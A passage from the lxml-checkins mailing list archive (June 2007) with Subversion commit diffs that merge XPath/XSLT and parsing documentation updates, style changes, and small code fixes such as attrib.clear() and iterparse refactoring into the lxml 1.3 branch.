is most interesting where XSL scripts come +from potentially insecure sources and must be prevented from modifying the +local file system. Note, however, that there is no way to keep them from +eating up your precious CPU time, so this should not stop you from thinking +about what XSLT you execute. Access control is configured using the ``XSLTAccessControl`` class. It can be called with a number of keyword arguments that allow or deny specific Modified: lxml/branch/lxml-1.3/doc/xpathxslt.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/xpathxslt.txt (original) +++ lxml/branch/lxml-1.3/doc/xpathxslt.txt Tue Jun 12 19:00:36 2007 @@ -6,9 +6,19 @@ compliant way. .. contents:: -.. +.. 1 XPath + 1.1 The ``xpath()`` method + 1.2 XPath return values + 1.3 The ``XPath`` class + 1.4 The ``XPathEvaluator`` classes + 1.5 ``ETXPath`` 2 XSLT + 2.1 XSLT result objects + 2.2 Stylesheet parameters + 2.3 The ``xslt()`` tree method + 2.4 Profiling + The usual setup procedure:: @@ -17,12 +27,17 @@ XPath ------ +===== -lxml.etree supports the simple path syntax of the ``findall()`` etc. methods -on ElementTree and Element, as known from the original ElementTree library. -As an extension, these classes also provide an ``xpath()`` method that -supports expressions in the complete XPath syntax. +lxml.etree supports the simple path syntax of the `find, findall and +findtext`_ methods on ElementTree and Element, as known from the original +ElementTree library (ElementPath_). As an lxml specific extension, these +classes also provide an ``xpath()`` method that supports expressions in the +complete XPath syntax, as well as `custom extension functions`_. + +.. _ElementPath: http://effbot.org/zone/element-xpath.htm +.. _`find, findall and findtext`: http://effbot.org/zone/element.htm#searching-for-subelements +.. _`custom extension functions`: extensions.html There are also specialized XPath evaluator classes that are more efficient for frequent evaluation: ``XPath`` and ``XPathEvaluator``. See the `performance @@ -32,6 +47,10 @@ .. _`performance comparison`: performance.html#xpath + +The ``xpath()`` method +---------------------- + For ElementTree, the xpath method performs a global XPath query against the document (if absolute) or against the root node (if relative):: @@ -48,7 +67,7 @@ >>> r[0].tag 'bar' -When ``xpath()`` is used on an element, the XPath expression is evaluated +When ``xpath()`` is used on an Element, the XPath expression is evaluated against the element (if relative) or against the root tree (if absolute):: >>> root = tree.getroot() @@ -66,6 +85,19 @@ >>> r[0].tag 'bar' +The ``xpath()`` method has support for XPath variables:: + + >>> expr = "//*[local-name() = $name]" + + >>> print root.xpath(expr, name = "foo")[0].tag + foo + + >>> print root.xpath(expr, name = "bar")[0].tag + bar + + >>> print root.xpath("$text", text = "Hello World!") + Hello World! + Optionally, you can provide a ``namespaces`` keyword argument, which should be a dictionary mapping the namespace prefixes used in the XPath expression to namespace URIs:: @@ -87,9 +119,11 @@ 'Text' There is also an optional ``extensions`` argument which is used to define -`extension functions`_ in Python that are local to this evaluation. +`custom extension functions`_ in Python that are local to this evaluation. + -.. _`extension functions`: extensions.html +XPath return values +------------------- The return values of XPath evaluations vary, depending on the XPath expression used: @@ -101,11 +135,10 @@ * a (unicode) string, when the XPath expression has a string result. * a list of items, when the XPath expression has a list as result. The items - may include elements, strings and tuples. Text nodes and attributes in the - result are returned as strings (the text node content or attribute value). - Comments are also returned as strings, enclosed by the usual ``<!--`` and - ``-->`` markers. Namespace declarations are returned as tuples of strings: - ``(prefix, URI)``. + may include elements (also comments and processing instructions), strings + and tuples. Text nodes and attributes in the result are returned as strings + (the text node content or attribute value). Namespace declarations are + returned as tuples of strings: ``(prefix, URI)``. A related convenience method of ElementTree objects is ``getpath(element)``, which returns a structural, absolute XPath expression to find that element:: @@ -123,8 +156,98 @@ True +The ``XPath`` class +------------------- + +The ``XPath`` class compiles an XPath expression into a callable function:: + + >>> root = etree.XML("<root><a><b/></a><b/></root>") + + >>> find = etree.XPath("//b") + >>> print find(root)[0].tag + b + +The compilation takes as much time as in the ``xpath()`` method, but it is +done only once per class instantiation. This makes it especially efficient +for repeated evaluation of the same XPath expression. + +Just like the ``xpath()`` method, the ``XPath`` class supports XPath +variables:: + + >>> count_elements = etree.XPath("count(//*[local-name() = $name])") + + >>> print count_elements(root, name = "a") + 1.0 + >>> print count_elements(root, name = "b") + 2.0 + +This supports very efficient evaluation of modified versions of an XPath +expression, as compilation is still only required once. + +Prefix-to-namespace mappings can be passed as second parameter:: + + >>> root = etree.XML("<root xmlns='NS'><a><b/></a><b/></root>") + + >>> find = etree.XPath("//n:b", {'n':'NS'}) + >>> print find(root)[0].tag + {NS}b + + +The ``XPathEvaluator`` classes +------------------------------ + +lxml.etree provides two other efficient XPath evaluators that work on +ElementTrees or Elements respectively: ``XPathDocumentEvaluator`` and +``XPathElementEvaluator``. They are automatically selected if you use the +XPathEvaluator helper for instantiation:: + + >>> root = etree.XML("<root><a><b/></a><b/></root>") + >>> xpatheval = etree.XPathEvaluator(root) + + >>> print isinstance(xpatheval, etree.XPathElementEvaluator) + True + + >>> print xpatheval("//b")[0].tag + b + +This class provides efficient support for evaluating different XPath +expressions on the same Element or ElementTree. + + +``ETXPath`` +----------- + +ElementTree supports a language named ElementPath_ in its ``find*()`` methods. +One of the main differences between XPath and ElementPath is that the XPath +language requires an indirection through prefixes for namespace support, +whereas ElementTree uses the Clark notation (``{ns}name``) to avoid prefixes +completely. The other major difference regards the capabilities of both path +languages. Where XPath supports various sophisticated ways of restricting the +result set through functions and boolean expressions, ElementPath only +supports pure path traversal without nesting or further conditions. So, while +the ElementPath syntax is self-contained and therefore easier to write and +handle, XPath is much more powerful and expressive. + +lxml.etree bridges this gap through the class ``ETXPath``, which accepts XPath +expressions with namespaces in Clark notation. It is identical to the +``XPath`` class, except for the namespace notation. Normally, you would +write:: + + >>> root = etree.XML("<root xmlns='ns'><a><b/></a><b/></root>") + + >>> find = etree.XPath("//p:b", {'p' : 'ns'}) + >>> print find(root)[0].tag + {ns}b + +``ETXPath`` allows you to change this to:: + + >>> find = etree.ETXPath("//{ns}b") + >>> print find(root)[0].tag + {ns}b + + XSLT ----- +==== lxml.etree introduces a new class, lxml.etree.XSLT. The class can be given an ElementTree object to construct an XSLT transformer:: @@ -144,9 +267,28 @@ >>> f = StringIO('<a><b>Text</b></a>') >>> doc = etree.parse(f) - >>> result = transform(doc) + >>> result_tree = transform(doc) -The result object can be accessed like a normal ElementTree document:: +By default, XSLT supports all extension functions from libxslt and libexslt +as well as Python regular expressions through the `EXSLT regexp functions`_. +Also see the documentation on `custom extension functions`_ and `document +resolvers`_. There is a separate section on `controlling access`_ to +external documents and resources. + +.. _`EXSLT regexp functions`: http://www.exslt.org/regexp/ +.. _`document resolvers`: resolvers.html +.. _`controlling access`: resolvers.html#i-o-access-control-in-xslt + + +XSLT result objects +------------------- + +The result of an XSL transformation can be accessed like a normal ElementTree +document:: + + >>> f = StringIO('<a><b>Text</b></a>') + >>> doc = etree.parse(f) + >>> result = transform(doc) >>> result.getroot().text 'Text' @@ -185,6 +327,10 @@ [...] LookupError: unknown encoding: UCS4 + +Stylesheet parameters +--------------------- + It is possible to pass parameters, in the form of XPath expressions, to the XSLT template:: @@ -212,7 +358,11 @@ >>> str(result) '<?xml version="1.0"?>\n<foo>Text</foo>\n' -There's also a convenience method on the tree object for doing XSL + +The ``xslt()`` tree method +-------------------------- + +There's also a convenience method on ElementTree objects for doing XSL transformations. This is less efficient if you want to apply the same XSL transformation to multiple documents, but is shorter to write for one-shot operations, as you do not have to instantiate a stylesheet yourself:: @@ -221,12 +371,16 @@ >>> str(result) '<?xml version="1.0"?>\n<foo>A</foo>\n' -By default, XSLT supports all extension functions from libxslt and libexslt as -well as Python regular expressions through EXSLT. Note that some extensions -enable style sheets to read and write files on the local file system. See the -`document loader documentation`_ on how to deal with this. +This is a shortcut for the following code:: + + >>> transform = etree.XSLT(xslt_tree) + >>> result = transform(doc, a="'A'") + >>> str(result) + '<?xml version="1.0"?>\n<foo>A</foo>\n' + -.. _`document loader documentation`: resolvers.html +Profiling +--------- If you want to know how your stylesheet performed, pass the ``profile_run`` keyword to the transform:: From scoder at codespeak.net Tue Jun 12 19:03:10 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:03:10 +0200 (CEST) Subject: [Lxml-checkins] r44182 - lxml/branch/lxml-1.3/doc Message-ID: <20070612170310.714668194@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:03:10 2007 New Revision: 44182 Modified: lxml/branch/lxml-1.3/doc/xpathxslt.txt Log: doc updates from trunk (XPath/XSLT) Modified: lxml/branch/lxml-1.3/doc/xpathxslt.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/xpathxslt.txt (original) +++ lxml/branch/lxml-1.3/doc/xpathxslt.txt Tue Jun 12 19:03:10 2007 @@ -10,9 +10,10 @@ 1 XPath 1.1 The ``xpath()`` method 1.2 XPath return values - 1.3 The ``XPath`` class - 1.4 The ``XPathEvaluator`` classes - 1.5 ``ETXPath`` + 1.3 Generating XPath expressions + 1.4 The ``XPath`` class + 1.5 The ``XPathEvaluator`` classes + 1.6 ``ETXPath`` 2 XSLT 2.1 XSLT result objects 2.2 Stylesheet parameters @@ -140,8 +141,12 @@ (the text node content or attribute value). Namespace declarations are returned as tuples of strings: ``(prefix, URI)``. -A related convenience method of ElementTree objects is ``getpath(element)``, -which returns a structural, absolute XPath expression to find that element:: + +Generating XPath expressions +---------------------------- + +ElementTree objects have a method ``getpath(element)``, which returns a +structural, absolute XPath expression to find that element:: >>> a = etree.Element("a") >>> b = etree.SubElement(a, "b") From scoder at codespeak.net Tue Jun 12 19:06:58 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:06:58 +0200 (CEST) Subject: [Lxml-checkins] r44183 - in lxml/branch/lxml-1.3: doc src/lxml Message-ID: <20070612170658.5384B8198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:06:58 2007 New Revision: 44183 Modified: lxml/branch/lxml-1.3/doc/parsing.txt lxml/branch/lxml-1.3/doc/validation.txt lxml/branch/lxml-1.3/src/lxml/parser.pxi Log: doc updates from trunk Modified: lxml/branch/lxml-1.3/doc/parsing.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/parsing.txt (original) +++ lxml/branch/lxml-1.3/doc/parsing.txt Tue Jun 12 19:06:58 2007 @@ -18,26 +18,56 @@ Parsers -------- +======= Parsers are represented by parser objects. There is support for parsing both -XML and (broken) HTML (note that XHTML is best parsed as XML). Both are based -on libxml2 and therefore only support options that are backed by the library. -Parsers take a number of keyword arguments. The following is an example for -namespace cleanup during parsing, first with the default parser, then with a -parametrized one:: +XML and (broken) HTML. Note that XHTML is best parsed as XML, parsing it with +the HTML parser can lead to unexpected results. Here is a simple example for +XML parsing:: >>> xml = '<a xmlns="test"><b xmlns="test"/></a>' - >>> et = etree.parse(StringIO(xml)) + >>> et = etree.parse(StringIO(xml)) >>> print etree.tostring(et.getroot()) <a xmlns="test"><b xmlns="test"/></a> + +Parser options +-------------- + +The parsers accept a number of setup options as keyword arguments. The above +example is easily extended to clean up namespaces during parsing:: + >>> parser = etree.XMLParser(ns_clean=True) >>> et = etree.parse(StringIO(xml), parser) >>> print etree.tostring(et.getroot()) <a xmlns="test"><b/></a> +The keyword arguments in the constructor are mainly based on the libxml2 +parser configuration. A DTD will also be loaded if validation or attribute +default values are requested. + +Available boolean keyword arguments: + +* attribute_defaults - read the DTD (if referenced by the document) and add + the default attributes from it + +* dtd_validation - validate while parsing (if a DTD was referenced) + +* load_dtd - load and parse the DTD while parsing (no validation is performed) + +* no_network - prevent network access when looking up external documents + +* ns_clean - try to clean up redundant namespace declarations + +* recover - try hard to parse through broken XML + +* remove_blank_text - discard blank text nodes between tags + + +Parsing HTML +------------ + HTML parsing is similarly simple. The parsers have a ``recover`` keyword argument that the HTMLParser sets by default. It lets libxml2 try its best to return something usable without raising an exception. You should use libxml2 @@ -48,15 +78,29 @@ >>> parser = etree.HTMLParser() >>> et = etree.parse(StringIO(broken_html), parser) - >>> print etree.tostring(et.getroot()) - <html><head><title>test

page title

+ >>> print etree.tostring(et.getroot(), pretty_print=True) + + + test + + +

page title

+ + Lxml has an HTML function, similar to the XML shortcut known from ElementTree:: >>> html = etree.HTML(broken_html) - >>> print etree.tostring(html) - test

page title

+ >>> print etree.tostring(html, pretty_print=True) + + + test + + +

page title

+ + The support for parsing broken HTML depends entirely on libxml2's recovery algorithm. It is *not* the fault of lxml if you find documents that are so @@ -66,6 +110,10 @@ parsing. Especially misplaced meta tags can suffer from this, which may lead to encoding problems. + +Doctype information +------------------- + The use of the libxml2 parsers makes some additional information available at the API level. Currently, ElementTree objects can access the DOCTYPE information provided by a parsed document, as well as the XML version and the @@ -93,7 +141,7 @@ iterparse and iterwalk ----------------------- +====================== As known from ElementTree, the ``iterparse()`` utility function returns an iterator that generates parser events for an XML file (or file-like object), @@ -125,7 +173,7 @@ >>> context.root.tag 'root' -The other types can be activated with the ``events`` keyword argument:: +The other event types can be activated with the ``events`` keyword argument:: >>> events = ("start", "end") >>> context = etree.iterparse(StringIO(xml), events=events) @@ -140,6 +188,32 @@ end {testns}empty-element end root + +Selective tag events +-------------------- + +As an extension over ElementTree, lxml.etree accepts a ``tag`` keyword +argument just like ``element.getiterator(tag)``. This restricts events to a +specific tag or namespace:: + + >>> context = etree.iterparse(StringIO(xml), tag="element") + >>> for action, elem in context: + ... print action, elem.tag + end element + end element + + >>> events = ("start", "end") + >>> context = etree.iterparse( + ... StringIO(xml), events=events, tag="{testns}*") + >>> for action, elem in context: + ... print action, elem.tag + start {testns}empty-element + end {testns}empty-element + + +Modifying the tree +------------------ + You can modify the element and its descendants when handling the 'end' event. To save memory, for example, you can remove subtrees that are no longer needed:: @@ -170,11 +244,12 @@ ... if element.getprevious(): # clean up preceding siblings ... del element.getparent()[0] -You can use ``while`` instead of ``if`` if you skipped siblings using the -``tag`` keyword argument. The more selective your tag is, however, the more -thought you will have to put into finding the right way to clean up the -elements that were skipped. Therefore, it is sometimes easier to traverse all -elements and do the tag selection by hand in the event handler code. +You can use ``while`` instead of the ``if`` to delete multiple siblings in a +row if you skipped over them using the ``tag`` keyword argument. The more +selective your tag is, however, the more thought you will have to put into +finding the right way to clean up the elements that were skipped. Therefore, +it is sometimes easier to traverse all elements and do the tag selection by +hand in the event handler code. The 'start-ns' and 'end-ns' events notify about namespace declarations and generate tuples ``(prefix, URI)``:: @@ -189,28 +264,28 @@ It is common practice to use a list as namespace stack and pop the last entry on the 'end-ns' event. -lxml.etree supports two extensions compared to ElementTree. It accepts a -``tag`` keyword argument just like ``element.getiterator(tag)``. This -restricts events to a specific tag or namespace. - >>> context = etree.iterparse(StringIO(xml), tag="element") +iterwalk +-------- + +A second extension over ElementTree is the ``iterwalk()`` function. It +behaves exactly like ``iterparse()``, but works on Elements and ElementTrees:: + + + >>> root = etree.XML(xml) + >>> context = etree.iterwalk( + ... root, events=("start", "end"), tag="element") >>> for action, elem in context: ... print action, elem.tag + start element end element + start element end element - >>> events = ("start", "end") - >>> context = etree.iterparse(StringIO(xml), events=events, tag="{testns}*") - >>> for action, elem in context: - ... print action, elem.tag - start {testns}empty-element - end {testns}empty-element - -The second extension is the ``iterwalk()`` function. It behaves exactly like -``iterparse()``, but works on Elements and ElementTrees:: + >>> f = StringIO(xml) + >>> context = etree.iterparse( + ... f, events=("start", "end"), tag="element") - >>> root = context.root - >>> context = etree.iterwalk(root, events=events, tag="element") >>> for action, elem in context: ... print action, elem.tag start element @@ -220,7 +295,7 @@ Python unicode strings ----------------------- +====================== lxml.etree has broader support for Python unicode strings than the ElementTree library. First of all, where ElementTree would raise an exception, the @@ -246,6 +321,10 @@ should generally avoid converting XML/HTML data to unicode before passing it into the parsers. It is both slower and error prone. + +Serialising to Unicode strings +------------------------------ + To serialize the result, you would normally use the ``tostring`` module function, which serializes to plain ASCII by default or a number of other encodings if asked for:: Modified: lxml/branch/lxml-1.3/doc/validation.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/validation.txt (original) +++ lxml/branch/lxml-1.3/doc/validation.txt Tue Jun 12 19:06:58 2007 @@ -4,7 +4,7 @@ Apart from the built-in DTD support in parsers, lxml currently supports three schema languages: DTD_, `Relax NG`_ and `XML Schema`_. All three provide -identical APIs in lxml, represented by a validator class with the obvious +identical APIs in lxml, represented by validator classes with the obvious names. .. _DTD: http://en.wikipedia.org/wiki/Document_Type_Definition Modified: lxml/branch/lxml-1.3/src/lxml/parser.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/parser.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/parser.pxi Tue Jun 12 19:06:58 2007 @@ -664,14 +664,9 @@ * recover - try hard to parse through broken XML * remove_blank_text - discard blank text nodes - For read-only documents that will not be altered after parsing, you can - also pass the following keyword arguments: - * compact - compactly store short element text content - - Note that you should avoid sharing parsers between threads. This does not + Note that you should avoid sharing parsers between threads. While this is + not harmful, it is more efficient to use separate parsers. This does not apply to the default parser. - - You must not modify documents that were parsed with the 'compact' option. """ def __init__(self, attribute_defaults=False, dtd_validation=False, load_dtd=False, no_network=False, ns_clean=False, @@ -794,12 +789,8 @@ * no_network - prevent network access * remove_blank_text - discard empty text nodes - For read-only documents that will not be altered after parsing, you can - also pass the following keyword arguments: - * compact - compactly store short element text content - - Note that you should avoid sharing parsers between threads. You must not - modify documents that were parsed with the 'compact' option. + Note that you should avoid sharing parsers between threads for parformance + reasons. """ def __init__(self, recover=True, no_network=False, remove_blank_text=False, compact=True): From scoder at codespeak.net Tue Jun 12 19:09:01 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:09:01 +0200 (CEST) Subject: [Lxml-checkins] r44185 - in lxml/branch/lxml-1.3/doc: . html Message-ID: <20070612170901.4286E8198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:09:00 2007 New Revision: 44185 Modified: lxml/branch/lxml-1.3/doc/html/style.css lxml/branch/lxml-1.3/doc/mkhtml.py lxml/branch/lxml-1.3/doc/parsing.txt Log: merged in doc updates from trunk Modified: lxml/branch/lxml-1.3/doc/html/style.css ============================================================================== --- lxml/branch/lxml-1.3/doc/html/style.css (original) +++ lxml/branch/lxml-1.3/doc/html/style.css Tue Jun 12 19:09:00 2007 @@ -8,14 +8,14 @@ padding: 1em 1em 1em 21em; } - div.document { + div.document, div.footer { width: 45em; background-color: white; } } @media print { - div.document { + div.document, div.footer { width: auto; padding-left: 0px; } @@ -25,12 +25,20 @@ } } -div.document { +div.document, div.footer { margin: 1em auto 1em auto; color: #222; +} + +div.document { text-align: left; } +div.footer { + text-align: center; + font-size: 70%; +} + /*** TOC ***/ div.contents.topic > ul { @@ -169,6 +177,12 @@ margin: 0.5em 0em 0em 0em; } +th.docinfo-name { + padding-left: 3ex; + text-align: right; + font-weight: bold; +} + hr { clear: both; height: 1px; Modified: lxml/branch/lxml-1.3/doc/mkhtml.py ============================================================================== --- lxml/branch/lxml-1.3/doc/mkhtml.py (original) +++ lxml/branch/lxml-1.3/doc/mkhtml.py Tue Jun 12 19:09:00 2007 @@ -1,5 +1,5 @@ from lxml.etree import parse, Element, SubElement, XPath -import os, shutil, re, sys, copy +import os, shutil, re, sys, copy, time SITE_STRUCTURE = [ ('lxml', ('main.txt', 'intro.txt', 'FAQ.txt', 'compatibility.txt', @@ -13,6 +13,8 @@ RST2HTML_OPTIONS = " ".join([ "--no-toc-backlinks", "--strip-comments", + "--language en", + "--date", ]) find_title = XPath("/h:html/h:head/h:title/text()", @@ -21,6 +23,8 @@ {"h" : "http://www.w3.org/1999/xhtml"}) find_menu = XPath("//h:ul[@id=$name]", {"h" : "http://www.w3.org/1999/xhtml"}) +find_page_end = XPath("/h:html/h:body/h:div[last()]", + {"h" : "http://www.w3.org/1999/xhtml"}) replace_invalid = re.compile(r'[-_/.\s\\]').sub Modified: lxml/branch/lxml-1.3/doc/parsing.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/parsing.txt (original) +++ lxml/branch/lxml-1.3/doc/parsing.txt Tue Jun 12 19:09:00 2007 @@ -240,16 +240,17 @@ >>> for event, element in etree.iterparse(StringIO(xml)): ... # ... do something with the element - ... element.clear() # clean up children - ... if element.getprevious(): # clean up preceding siblings - ... del element.getparent()[0] - -You can use ``while`` instead of the ``if`` to delete multiple siblings in a -row if you skipped over them using the ``tag`` keyword argument. The more -selective your tag is, however, the more thought you will have to put into -finding the right way to clean up the elements that were skipped. Therefore, -it is sometimes easier to traverse all elements and do the tag selection by -hand in the event handler code. + ... element.clear() # clean up children + ... while element.getprevious() is not None: + ... del element.getparent()[0] # clean up preceding siblings + +The ``while`` loop deletes multiple siblings in a row. This is only necessary +if you skipped over some of them using the ``tag`` keyword argument. +Otherwise, a simple ``if`` should do. The more selective your tag is, +however, the more thought you will have to put into finding the right way to +clean up the elements that were skipped. Therefore, it is sometimes easier to +traverse all elements and do the tag selection by hand in the event handler +code. The 'start-ns' and 'end-ns' events notify about namespace declarations and generate tuples ``(prefix, URI)``:: From scoder at codespeak.net Tue Jun 12 19:11:48 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:11:48 +0200 (CEST) Subject: [Lxml-checkins] r44186 - in lxml/branch/lxml-1.3: . src/lxml src/lxml/tests Message-ID: <20070612171148.168168198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:11:47 2007 New Revision: 44186 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/selftest.py lxml/branch/lxml-1.3/selftest2.py lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/iterparse.pxi lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py lxml/branch/lxml-1.3/src/lxml/xmlparser.pxd Log: merged in revs 43159:43235 from trunk Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 19:11:47 2007 @@ -22,6 +22,12 @@ Bugs fixed ---------- +* More ET compatible behaviour when writing out XML declarations or not + +* ``Element.attrib`` was missing ``clear()`` method + +* More robust error handling in ``iterparse()`` + * Documents lost their top-level PIs and comments on serialisation * lxml.sax failed on comments and PIs. Comments are now properly ignored and Modified: lxml/branch/lxml-1.3/selftest.py ============================================================================== --- lxml/branch/lxml-1.3/selftest.py (original) +++ lxml/branch/lxml-1.3/selftest.py Tue Jun 12 19:11:47 2007 @@ -272,28 +272,31 @@ ## '

spamegg

' ## """ -## def parseliteral(): -## r""" -## >>> element = ElementTree.XML("text") -## >>> ElementTree.ElementTree(element).write(sys.stdout) -## text -## >>> element = ElementTree.fromstring("text") -## >>> ElementTree.ElementTree(element).write(sys.stdout) -## text -## >>> print ElementTree.tostring(element) -## text -## >>> print ElementTree.tostring(element, "ascii") -## -## text -## >>> _, ids = ElementTree.XMLID("text") -## >>> len(ids) -## 0 -## >>> _, ids = ElementTree.XMLID("text") -## >>> len(ids) -## 1 -## >>> ids["body"].tag -## 'body' -## """ +def parseliteral(): + r""" + >>> element = ElementTree.XML("text") + >>> ElementTree.ElementTree(element).write(sys.stdout) + text + >>> element = ElementTree.fromstring("text") + >>> ElementTree.ElementTree(element).write(sys.stdout) + text + >>> print ElementTree.tostring(element) + text + +# looks different in lxml +# >>> print ElementTree.tostring(element, "ascii") +# +# text + + >>> _, ids = ElementTree.XMLID("text") + >>> len(ids) + 0 + >>> _, ids = ElementTree.XMLID("text") + >>> len(ids) + 1 + >>> ids["body"].tag + 'body' + """ ## def simpleparsefile(): ## """ @@ -519,16 +522,18 @@ ## """ -## def xmllang(): -## """ -## This appears to be a problem; in underlying libxml2? +def xmllang(): + """ + This appears to be a problem; in underlying libxml2? -## 1) xml namespace + 1) xml namespace -## >>> elem = ElementTree.XML("") -## >>> serialize(elem) # 1.1 -## '' -## """ + >>> elem = ElementTree.XML("") + >>> serialize(elem) # 1.1 + '' + +# '' # ElementTree produces an extra blank + """ def namespace(): """ Modified: lxml/branch/lxml-1.3/selftest2.py ============================================================================== --- lxml/branch/lxml-1.3/selftest2.py (original) +++ lxml/branch/lxml-1.3/selftest2.py Tue Jun 12 19:11:47 2007 @@ -133,30 +133,30 @@ 'textsubtext' """ -## def encoding(): -## r""" -## Test encoding issues. +def encoding(): + r""" + Test encoding issues. -## >>> elem = ElementTree.Element("tag") -## >>> elem.text = u"abc" -## >>> serialize(elem) -## 'abc' -## >>> serialize(elem, "utf-8") -## 'abc' -## >>> serialize(elem, "us-ascii") -## 'abc' -## >>> serialize(elem, "iso-8859-1") -## "\nabc" + >>> elem = ElementTree.Element("tag") + >>> elem.text = u"abc" + >>> serialize(elem) + 'abc' + >>> serialize(elem, "utf-8") + 'abc' + >>> serialize(elem, "us-ascii") + 'abc' + >>> serialize(elem, "iso-8859-1").lower() + "\nabc" -## >>> elem.text = "<&\"\'>" -## >>> serialize(elem) -## '<&"\'>' -## >>> serialize(elem, "utf-8") -## '<&"\'>' -## >>> serialize(elem, "us-ascii") # cdata characters -## '<&"\'>' -## >>> serialize(elem, "iso-8859-1") -## '\n<&"\'>' + >>> elem.text = "<&\"\'>" + >>> serialize(elem) + '<&"\'>' + >>> serialize(elem, "utf-8") + '<&"\'>' + >>> serialize(elem, "us-ascii") # cdata characters + '<&"\'>' + >>> serialize(elem, "iso-8859-1").lower() + '\n<&"\'>' ## >>> elem.attrib["key"] = "<&\"\'>" ## >>> elem.text = None @@ -169,16 +169,16 @@ ## >>> serialize(elem, "iso-8859-1") ## '\n' -## >>> elem.text = u'\xe5\xf6\xf6<>' -## >>> elem.attrib.clear() -## >>> serialize(elem) -## 'åöö<>' -## >>> serialize(elem, "utf-8") -## '\xc3\xa5\xc3\xb6\xc3\xb6<>' -## >>> serialize(elem, "us-ascii") -## 'åöö<>' -## >>> serialize(elem, "iso-8859-1") -## "\n\xe5\xf6\xf6<>" + >>> elem.text = u'\xe5\xf6\xf6<>' + >>> elem.attrib.clear() + >>> serialize(elem) + 'åöö<>' + >>> serialize(elem, "utf-8") + '\xc3\xa5\xc3\xb6\xc3\xb6<>' + >>> serialize(elem, "us-ascii") + 'åöö<>' + >>> serialize(elem, "iso-8859-1").lower() + "\n\xe5\xf6\xf6<>" ## >>> elem.attrib["key"] = u'\xe5\xf6\xf6<>' ## >>> elem.text = None @@ -191,25 +191,25 @@ ## >>> serialize(elem, "iso-8859-1") ## '\n' -## """ + """ -## def qname(): -## """ -## Test QName handling. +def qname(): + """ + Test QName handling. -## 1) decorated tags + 1) decorated tags -## >>> elem = ElementTree.Element("{uri}tag") -## >>> serialize(elem) # 1.1 -## '' + >>> elem = ElementTree.Element("{uri}tag") + >>> serialize(elem) # 1.1 + '' ## 2) decorated attributes ## >>> elem.attrib["{uri}key"] = "value" ## >>> serialize(elem) # 2.1 -## '' +## '' -## """ + """ def cdata(): """ Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 19:11:47 2007 @@ -1453,6 +1453,12 @@ _delAttribute(self._element, key) return result + def clear(self): + cdef xmlNode* c_node + c_node = self._element._c_node + while c_node.properties is not NULL: + tree.xmlRemoveProp(c_node.properties) + # ACCESSORS def __repr__(self): return repr(dict( _attributeIteratorFactory(self._element, 3) )) @@ -1871,17 +1877,15 @@ """ cdef int write_declaration cdef int c_pretty_print - if encoding is None: - encoding = 'ASCII' - else: - encoding = encoding.upper() c_pretty_print = bool(pretty_print) if xml_declaration is None: # by default, write an XML declaration only for non-standard encodings - write_declaration = encoding not in \ + write_declaration = encoding is not None and encoding.upper() not in \ ('ASCII', 'UTF-8', 'UTF8', 'US-ASCII') else: write_declaration = bool(xml_declaration) + if encoding is None: + encoding = 'ASCII' if isinstance(element_or_tree, _Element): return _tostring(<_Element>element_or_tree, Modified: lxml/branch/lxml-1.3/src/lxml/iterparse.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/iterparse.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/iterparse.pxi Tue Jun 12 19:11:47 2007 @@ -48,7 +48,7 @@ c_ns = c_ns.next return count -cdef class _IterparseResolverContext(_ResolverContext): +cdef class _IterparseContext(_ResolverContext): cdef xmlparser.startElementNsSAX2Func _origSaxStart cdef xmlparser.endElementNsSAX2Func _origSaxEnd cdef _Element _root @@ -64,8 +64,8 @@ cdef char* _tag_href cdef char* _tag_name - def __init__(self, *args): - _ResolverContext.__init__(self, *args) + def __init__(self, _ResolverRegistry resolvers): + _ResolverContext.__init__(self, resolvers) self._ns_stack = [] self._pop_ns = self._ns_stack.pop self._node_stack = [] @@ -90,7 +90,7 @@ ITERPARSE_FILTER_END_NS): sax.endElementNs = _saxEnd - cdef void _setEventFilter(self, events, tag): + cdef _setEventFilter(self, events, tag): self._event_filter = _buildIterparseEventFilter(events) if tag is None or tag == '*': self._tag_href = NULL @@ -109,8 +109,7 @@ if self._tag_href is NULL and self._tag_name is NULL: self._tag_tuple = None - cdef void startNode(self, xmlNode* c_node): - cdef _Element node + cdef int startNode(self, xmlNode* c_node) except -1: cdef xmlNs* c_ns cdef int ns_count if self._event_filter & ITERPARSE_FILTER_START_NS: @@ -129,9 +128,9 @@ python.PyList_Append(self._node_stack, node) if self._event_filter & ITERPARSE_FILTER_START: python.PyList_Append(self._events, ("start", node)) + return 0 - cdef void endNode(self, xmlNode* c_node): - cdef _Element node + cdef int endNode(self, xmlNode* c_node) except -1: cdef xmlNs* c_ns cdef int ns_count if self._event_filter & ITERPARSE_FILTER_END: @@ -141,7 +140,6 @@ ITERPARSE_FILTER_START_NS | \ ITERPARSE_FILTER_END_NS): node = self._pop_node() - assert node._c_node is c_node else: if self._doc is None: self._doc = _documentFactory(c_node.doc, None) @@ -155,23 +153,36 @@ event = ("end-ns", None) for i from 0 <= i < ns_count: python.PyList_Append(self._events, event) + return 0 